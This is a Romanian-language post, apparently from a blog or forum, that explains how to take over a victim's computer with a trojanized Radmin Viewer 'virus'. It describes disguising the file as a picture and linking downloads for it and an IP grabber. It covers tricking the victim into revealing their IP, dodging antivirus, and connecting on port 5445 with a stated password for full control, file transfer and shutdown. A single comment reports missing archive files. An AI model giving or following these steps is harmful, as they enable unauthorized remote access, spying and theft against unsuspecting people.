Programul se numeste Radmin Wiever probabil uni dintre voi il stiti , acest program este destul de usor de folosit adica : ii dati victimei virusul ea il deschide ii apare o poza si asta e tot deci sa incepem:
Download Radmin wiever virus : http://www.fileshare.ro/5.03120919009E+16
Acum instalam programul Radmin Wiever ,apoi dam virusul victimei , victima il deschide si tot ce mai trebuie sa faci e sa ii afli ip, acu depinzand de cat de inteligenta e persoana puteti sa intrati cu team wiever sa ziceti ca ii faceti cv , puteti sa folositi un software special pentru aflarea ip-ului gen :http://fisierulmeu.ro/22N47METRRS8/Xard ... r-exe.html aveti grija cu antivirusu sa nu il strice sau sa il stearga e valabil si pentru virusul radmin uni antivirusi ii detecteaza si ii strica , o alta metoda de aflat ip e sa scriem in cmd "netstat-d" unde apare toate ip si aplicatiile si de acolo il puteti lua, apoi dupa ce avem ip victima si victima deschide virusul intram in Radmin Wiever si apasam "Adauga o noua conexiune" apoi la nume intrare puneti ce vreti ex: "victima" apoi la ip punem ip victimei la port punem portul 5445 si debifam casuta de sub port iar in final apasam ok, dupa taote astea avem mai multe posibilitati de folosire de la file transfer la full control si view only la reboot si turn off , dupa terminarea procesului de mai sus va va aparea o punte de conexiune in panoul programului pe care dam klick dreapta si alegem ce facem dupa ce alegem o parola este necesara parola fiind "xplicit" pentru cei care folosec pentru primadata un astfel de software va recomand sa il incercati pe voi insiva pentru a capata experienta,sper sa va fie de folos.
lipsesc fisiere din arhiva
RăspundețiȘtergere